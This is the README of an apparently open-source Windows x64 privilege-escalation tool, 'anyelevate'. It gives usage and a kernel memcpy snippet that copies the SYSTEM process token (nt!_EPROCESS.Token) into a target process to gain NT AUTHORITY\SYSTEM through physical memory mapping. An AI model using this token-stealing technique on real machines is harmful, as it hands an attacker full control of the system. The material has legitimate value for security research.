CI falling because of version mismatch of static library, dont care
x64 Windows privilege elevation using anycall
anyelevate.exe [process id]
[process id]
process id to elevate privilege
Simply create copy of nt!_EPROCESS.Token
in any desired target process.
kernel::memcpy(
( void* )( ( uint64_t )process + RVA_PEPROCESS_TOKEN ),
&system_process_token,
sizeof( EX_FAST_REF ) );
Then you are NT AUTHORITY\SYSTEM
.
Imagine this is all done by one thing - the physical memory mapping.
MIT copyright Kento Oki <hrn832@protonmail.com>
color-console copyright 2018 Lei Fu